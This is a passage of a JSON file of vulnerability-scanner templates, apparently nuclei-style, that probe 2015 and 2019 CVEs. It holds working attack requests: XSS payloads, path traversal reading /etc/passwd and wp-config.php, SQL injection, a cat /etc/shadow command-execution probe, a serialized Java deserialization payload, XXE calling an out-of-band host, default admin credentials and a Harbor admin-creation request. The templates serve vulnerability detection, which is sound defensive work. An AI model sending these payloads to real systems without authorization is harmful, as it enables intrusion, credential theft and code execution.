Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?page=pie-register&show_dash_widget=1&invitaion_code=PC9zY3JpcHQ+PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2067","info":{"name":"Magento Server MAGMI - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2196","info":{"name":"WordPress Spider Calendar <=1.4.9 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout 10s\nGET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=1)+AND+(SELECT+1183+FROM+(SELECT(SLEEP(6)))UPad)+AND+(9752=9752&type=json HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code == 200","contains(body, \"{\\\"status\\\":true,\\\"data\\\"\")"],"condition":"and"}]}]},{"id":"CVE-2015-7245","info":{"name":"D-Link DVG-N5402SP - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /cgibin/webproc HTTP/1.1\nHost: {{Hostname}}\n\ngetpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/passwd&var%3Amenu=setup&var%3Apage=connected&var%&objaction=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh\n"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2015-4666","info":{"name":"Xceedium Xsuite <=2.4.4.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/opm/read_sessionlog.php?logFile=....//....//....//....//etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1579","info":{"name":"WordPress Slider Revolution - Local File Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php","{{BaseURL}}/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'DB_NAME'","'DB_PASSWORD'","'DB_USER'"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-8813","info":{"name":"Umbraco <7.4.0- Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/Umbraco/feedproxy.aspx?url=http://{{interactsh-url}}"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2015-4127","info":{"name":"WordPress Church Admin <0.810 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-5471","info":{"name":"Swim Team <= v1.44.10777 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4414","info":{"name":"WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-5688","info":{"name":"Geddy <13.0.8 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-8349","info":{"name":"SourceBans <2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?p=banlist&advSearch=0%27%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&advType=btype"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2863","info":{"name":"Kaseya Virtual System Administrator - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/inc/supportLoad.asp?urlToLoad=http://oast.me","{{BaseURL}}/vsaPres/Web20/core/LocalProxy.ashx?url=http://oast.me"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2015-1880","info":{"name":"Fortinet FortiOS <=5.2.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/remote/login?&err=--%3E%3Cscript%3Ealert('{{randstr}}')%3C/script%3E%3C!--&lang=en"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert('{{randstr}}')</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-7780","info":{"name":"ManageEngine Firewall Analyzer <8.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/fw/mindex.do?url=./WEB-INF/web.xml%3f"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</web-app>","java.sun.com"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4694","info":{"name":"WordPress Zip Attachments <= 1.1.4 - Arbitrary File Retrieval","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-7297","info":{"name":"Joomla! Core SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5({{num}})),1)"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2015-7450","info":{"name":"IBM WebSphere Java Object Deserialization - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml; charset=utf-8\nSOAPAction: \"urn:AdminService\"\n\n<?xml version='1.0' encoding='UTF-8'?>\n<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\">\n<SOAP-ENV:Header ns0:JMXConnectorContext=\"rO0ABXNyAA9qYXZhLnV0aWwuU3RhY2sQ/irCuwmGHQIAAHhyABBqYXZhLnV0aWwuVmVjdG9y2Zd9W4A7rwEDAANJABFjYXBhY2l0eUluY3JlbWVudEkADGVsZW1lbnRDb3VudFsAC2VsZW1lbnREYXRhdAATW0xqYXZhL2xhbmcvT2JqZWN0O3hwAAAAAAAAAAF1cgATW0xqYXZhLmxhbmcuT2JqZWN0O5DOWJ8QcylsAgAAeHAAAAAKc3IAOmNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3IuSk1YQ29ubmVjdG9yQ29udGV4dEVsZW1lbnTblRMyYyF8sQIABUwACGNlbGxOYW1ldAASTGphdmEvbGFuZy9TdHJpbmc7TAAIaG9zdE5hbWVxAH4AB0wACG5vZGVOYW1lcQB+AAdMAApzZXJ2ZXJOYW1lcQB+AAdbAApzdGFja1RyYWNldAAeW0xqYXZhL2xhbmcvU3RhY2tUcmFjZUVsZW1lbnQ7eHB0AAB0AAhMYXAzOTAxM3EAfgAKcQB+AAp1cgAeW0xqYXZhLmxhbmcuU3RhY2tUcmFjZUVsZW1lbnQ7AkYqPDz9IjkCAAB4cAAAACpzcgAbamF2YS5sYW5nLlN0YWNrVHJhY2VFbGVtZW50YQnFmiY23YUCAARJAApsaW5lTnVtYmVyTAAOZGVjbGFyaW5nQ2xhc3NxAH4AB0wACGZpbGVOYW1lcQB+AAdMAAptZXRob2ROYW1lcQB+AAd4cAAAAEt0ADpjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLkpNWENvbm5lY3RvckNvbnRleHRFbGVtZW50dAAfSk1YQ29ubmVjdG9yQ29udGV4dEVsZW1lbnQuamF2YXQABjxpbml0PnNxAH4ADgAAADx0ADNjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLkpNWENvbm5lY3RvckNvbnRleHR0ABhKTVhDb25uZWN0b3JDb250ZXh0LmphdmF0AARwdXNoc3EAfgAOAAAGQ3QAOGNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3Iuc29hcC5TT0FQQ29ubmVjdG9yQ2xpZW50dAAYU09BUENvbm5lY3RvckNsaWVudC5qYXZhdAAcZ2V0Sk1YQ29ubmVjdG9yQ29udGV4dEhlYWRlcnNxAH4ADgAAA0h0ADhjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLnNvYXAuU09BUENvbm5lY3RvckNsaWVudHQAGFNPQVBDb25uZWN0b3JDbGllbnQuamF2YXQAEmludm9rZVRlbXBsYXRlT25jZXNxAH4ADgAAArF0ADhjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLnNvYXAuU09BUENvbm5lY3RvckNsaWVudHQAGFNPQVBDb25uZWN0b3JDbGllbnQuamF2YXQADmludm9rZVRlbXBsYXRlc3EAfgAOAAACp3QAOGNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3Iuc29hcC5TT0FQQ29ubmVjdG9yQ2xpZW50dAAYU09BUENvbm5lY3RvckNsaWVudC5qYXZhdAAOaW52b2tlVGVtcGxhdGVzcQB+AA4AAAKZdAA4Y29tLmlibS53cy5tYW5hZ2VtZW50LmNvbm5lY3Rvci5zb2FwLlNPQVBDb25uZWN0b3JDbGllbnR0ABhTT0FQQ29ubmVjdG9yQ2xpZW50LmphdmF0AAZpbnZva2VzcQB+AA4AAAHndAA4Y29tLmlibS53cy5tYW5hZ2VtZW50LmNvbm5lY3Rvci5zb2FwLlNPQVBDb25uZWN0b3JDbGllbnR0ABhTT0FQQ29ubmVjdG9yQ2xpZW50LmphdmF0AAZpbnZva2VzcQB+AA7/////dAAVY29tLnN1bi5wcm94eS4kUHJveHkwcHQABmludm9rZXNxAH4ADgAAAOB0ACVjb20uaWJtLndzLm1hbmFnZW1lbnQuQWRtaW5DbGllbnRJbXBsdAAUQWRtaW5DbGllbnRJbXBsLmphdmF0AAZpbnZva2VzcQB+AA4AAADYdAA9Y29tLmlibS53ZWJzcGhlcmUubWFuYWdlbWVudC5jb25maWdzZXJ2aWNlLkNvbmZpZ1NlcnZpY2VQcm94eXQAF0NvbmZpZ1NlcnZpY2VQcm94eS5qYXZhdAARZ2V0VW5zYXZlZENoYW5nZXNzcQB+AA4AAAwYdAAmY29tLmlibS53cy5zY3JpcHRpbmcuQWRtaW5Db25maWdDbGllbnR0ABZBZG1pbkNvbmZpZ0NsaWVudC5qYXZhdAAKaGFzQ2hhbmdlc3NxAH4ADgAAA/Z0AB5jb20uaWJtLndzLnNjcmlwdGluZy5XYXN4U2hlbGx0AA5XYXN4U2hlbGwuamF2YXQACHRpbWVUb0dvc3EAfgAOAAAFm3QAImNvbS5pYm0ud3Muc2NyaXB0aW5nLkFic3RyYWN0U2hlbGx0ABJBYnN0cmFjdFNoZWxsLmphdmF0AAtpbnRlcmFjdGl2ZXNxAH4ADgAACPp0ACJjb20uaWJtLndzLnNjcmlwdGluZy5BYnN0cmFjdFNoZWxsdAASQWJzdHJhY3RTaGVsbC5qYXZhdAADcnVuc3EAfgAOAAAElHQAHmNvbS5pYm0ud3Muc2NyaXB0aW5nLldhc3hTaGVsbHQADldhc3hTaGVsbC5qYXZhdAAEbWFpbnNxAH4ADv////50ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQAB2ludm9rZTBzcQB+AA4AAAA8dAAkc3VuLnJlZmxlY3QuTmF0aXZlTWV0aG9kQWNjZXNzb3JJbXBsdAAdTmF0aXZlTWV0aG9kQWNjZXNzb3JJbXBsLmphdmF0AAZpbnZva2VzcQB+AA4AAAAldAAoc3VuLnJlZmxlY3QuRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbHQAIURlbGVnYXRpbmdNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAAmN0ABhqYXZhLmxhbmcucmVmbGVjdC5NZXRob2R0AAtNZXRob2QuamF2YXQABmludm9rZXNxAH4ADgAAAOp0ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAAKbGF1bmNoTWFpbnNxAH4ADgAAAGB0ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAAEbWFpbnNxAH4ADgAAAE10ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAADcnVuc3EAfgAO/////nQAJHN1bi5yZWZsZWN0Lk5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbHQAHU5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAHaW52b2tlMHNxAH4ADgAAADx0ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAACV0AChzdW4ucmVmbGVjdC5EZWxlZ2F0aW5nTWV0aG9kQWNjZXNzb3JJbXBsdAAhRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAGaW52b2tlc3EAfgAOAAACY3QAGGphdmEubGFuZy5yZWZsZWN0Lk1ldGhvZHQAC01ldGhvZC5qYXZhdAAGaW52b2tlc3EAfgAOAAACS3QANG9yZy5lY2xpcHNlLmVxdWlub3guaW50ZXJuYWwuYXBwLkVjbGlwc2VBcHBDb250YWluZXJ0ABhFY2xpcHNlQXBwQ29udGFpbmVyLmphdmF0ABdjYWxsTWV0aG9kV2l0aEV4Y2VwdGlvbnNxAH4ADgAAAMZ0ADFvcmcuZWNsaXBzZS5lcXVpbm94LmludGVybmFsLmFwcC5FY2xpcHNlQXBwSGFuZGxldAAVRWNsaXBzZUFwcEhhbmRsZS5qYXZhdAADcnVuc3EAfgAOAAAAbnQAPG9yZy5lY2xpcHNlLmNvcmUucnVudGltZS5pbnRlcm5hbC5hZGFwdG9yLkVjbGlwc2VBcHBMYXVuY2hlcnQAF0VjbGlwc2VBcHBMYXVuY2hlci5qYXZhdAAOcnVuQXBwbGljYXRpb25zcQB+AA4AAABPdAA8b3JnLmVjbGlwc2UuY29yZS5ydW50aW1lLmludGVybmFsLmFkYXB0b3IuRWNsaXBzZUFwcExhdW5jaGVydAAXRWNsaXBzZUFwcExhdW5jaGVyLmphdmF0AAVzdGFydHNxAH4ADgAAAXF0AC9vcmcuZWNsaXBzZS5jb3JlLnJ1bnRpbWUuYWRhcHRvci5FY2xpcHNlU3RhcnRlcnQAE0VjbGlwc2VTdGFydGVyLmphdmF0AANydW5zcQB+AA4AAACzdAAvb3JnLmVjbGlwc2UuY29yZS5ydW50aW1lLmFkYXB0b3IuRWNsaXBzZVN0YXJ0ZXJ0ABNFY2xpcHNlU3RhcnRlci5qYXZhdAADcnVuc3EAfgAO/////nQAJHN1bi5yZWZsZWN0Lk5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbHQAHU5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAHaW52b2tlMHNxAH4ADgAAADx0ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAACV0AChzdW4ucmVmbGVjdC5EZWxlZ2F0aW5nTWV0aG9kQWNjZXNzb3JJbXBsdAAhRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAGaW52b2tlc3EAfgAOAAACY3QAGGphdmEubGFuZy5yZWZsZWN0Lk1ldGhvZHQAC01ldGhvZC5qYXZhdAAGaW52b2tlc3EAfgAOAAABVHQAHm9yZy5lY2xpcHNlLmNvcmUubGF1bmNoZXIuTWFpbnQACU1haW4uamF2YXQAD2ludm9rZUZyYW1ld29ya3NxAH4ADgAAARp0AB5vcmcuZWNsaXBzZS5jb3JlLmxhdW5jaGVyLk1haW50AAlNYWluLmphdmF0AAhiYXNpY1J1bnNxAH4ADgAAA9V0AB5vcmcuZWNsaXBzZS5jb3JlLmxhdW5jaGVyLk1haW50AAlNYWluLmphdmF0AANydW5zcQB+AA4AAAGQdAAlY29tLmlibS53c3NwaS5ib290c3RyYXAuV1NQcmVMYXVuY2hlcnQAEldTUHJlTGF1bmNoZXIuamF2YXQADWxhdW5jaEVjbGlwc2VzcQB+AA4AAACjdAAlY29tLmlibS53c3NwaS5ib290c3RyYXAuV1NQcmVMYXVuY2hlcnQAEldTUHJlTGF1bmNoZXIuamF2YXQABG1haW5wcHBwcHBwcHB4\" xmlns:ns0=\"admin\" ns0:WASRemoteRuntimeVersion=\"8.5.5.7\" ns0:JMXMessageVersion=\"1.2.0\" ns0:JMXVersion=\"1.2.0\">\n</SOAP-ENV:Header>\n<SOAP-ENV:Body>\n<ns1:invoke xmlns:ns1=\"urn:AdminService\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n<objectname xsi:type=\"ns1:javax.management.ObjectName\">rO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==</objectname>\n<operationname xsi:type=\"xsd:string\">getUnsavedChanges</operationname>\n<params xsi:type=\"ns1:[Ljava.lang.Object;\">{{ generate_java_gadget(\"dns\", \"{{interactsh-url}}\", \"base64-raw\")}}</params>\n<signature xsi:type=\"ns1:[Ljava.lang.String;\">rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24=</signature>\n</ns1:invoke>\n</SOAP-ENV:Body>\n</SOAP-ENV:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["SOAP-ENV:Server","<faultcode>"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2015-3035","info":{"name":"TP-LINK - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/login/../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2755","info":{"name":"WordPress AB Google Map Travel <=3.4 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nPOST /wp-admin/admin.php?page=ab_map_options HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlat=%22%3E+%3Cscript%3E%2B-%2B-1-%2B-%2Balert%28document.domain%29%3C%2Fscript%3E&long=76.26730&lang=en&map_width=500&map_height=300&zoom=7&day_less_five_fare=2&day_more_five_fare=1.5&less_five_fare=3&more_five_fare=2.5&curr_format=%24&submit=Update+Settings\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>+-+-1-+-+alert(document.domain)</script>\")","contains(body_2, \"ab-google-map-travel\")"],"condition":"and"}]}]},{"id":"CVE-2015-1503","info":{"name":"IceWarp Mail Server <11.1.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd","{{BaseURL}}/webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-7823","info":{"name":"Kentico CMS 8.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/CMSPages/GetDocLink.ashx?link=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2015-2996","info":{"name":"SysAid Help Desk <15.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd","{{BaseURL}}/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11580","info":{"name":"Atlassian Crowd and Crowd Data Center Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["root:*:","bin:*:"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7609","info":{"name":"Kibana Timelion - Arbitrary Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/timelion/run"],"body":"{\"sheet\":[\".es(*)\"],\"time\":{\"from\":\"now-1m\",\"to\":\"now\",\"mode\":\"quick\",\"interval\":\"auto\",\"timezone\":\"Asia/Shanghai\"}}","headers":{"Content-Type":"application/json; charset=utf-8"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["seriesList"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7219","info":{"name":"Zarafa WebApp <=2.0.1.47791 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webapp/?fccc%27\\%22%3E%3Csvg/onload=alert(/xss/)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(/xss/)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11013","info":{"name":"Nimble Streamer <=3.5.4-9 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-18393","info":{"name":"Ignite Realtime Openfire <4.42 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/search/..\\..\\..\\conf\\openfire.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["org.jivesoftware.database.EmbeddedConnectionProvider","Most properties are stored in the Openfire database"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12616","info":{"name":"phpMyAdmin <4.9.0 - Cross-Site Request Forgery","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/phpmyadmin/"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 4.9.0')"]},{"type":"word","words":["phpmyadmin.net","phpMyAdmin"],"condition":"or"},{"type":"status","status":[200,401]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\\?v=([0-9.]+)"],"internal":true},{"type":"regex","group":1,"regex":["\\?v=([0-9.]+)"]}]}]},{"id":"CVE-2019-10092","info":{"name":"Apache HTTP Server <=2.4.39 -  HTML Injection/Partial Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5cgoogle.com/evil.html"],"matchers":[{"type":"word","words":["<a href=\"/\\google.com/evil.html\">"]}]}]},{"id":"CVE-2019-17444","info":{"name":"Jfrog Artifactory <6.17.0 - Default Admin Password","severity":"critical"},"requests":[{"raw":["POST /ui/api/v1/ui/auth/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\nX-Requested-With: XMLHttpRequest\nOrigin: {{RootURL}}\n\n{\"user\":\"admin\",\"password\":\"password\",\"type\":\"login\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"name\":\"admin\"","\"admin\":true"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-2767","info":{"name":"Oracle Business Intelligence Publisher - XML External Entity Injection","severity":"high"},"requests":[{"raw":["GET /xmlpserver/convert?xml=<%3fxml+version%3d\"1.0\"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+\"http%3a//{{interactsh-url}}/xxe.xml\">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-16097","info":{"name":"Harbor <=1.82.0 - Privilege Escalation","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/users"],"body":"{\"username\": \"testpoc\", \"has_admin_role\": true, \"password\": \"TestPoc!\", \"email\": \"testpoc@interact.sh\", \"realname\": \"poc\"}\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"response","words":["username has already been used","Location: /api/users/"],"condition":"or"},{"type":"status","status":[201,409],"condition":"or"}]}]},{"id":"CVE-2019-14251","info":{"name":"T24 Web Server - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/WealthT24/GetImage?docDownloadPath=/etc/passwd","{{BaseURL}}/WealthT24/GetImage?docDownloadPath=c:/windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:","for 16-bit app support"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-20933","info":{"name":"InfluxDB <1.7.6 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/query?db=db&q=SHOW%20DATABASES"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"results\":","\"name\":\"databases\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9922","info":{"name":"Joomla! Harmis Messenger 1.2.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/component/jemessenger/box_details?task=download&dw_file=../../.././../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9670","info":{"name":"Synacor Zimbra Collaboration <8.7.11p10 - XML External Entity Injection","severity":"critical"},"requests":[{"raw":["POST /Autodiscover/Autodiscover.xml HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<!DOCTYPE xxe [\n<!ELEMENT name ANY >\n<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]>\n<Autodiscover 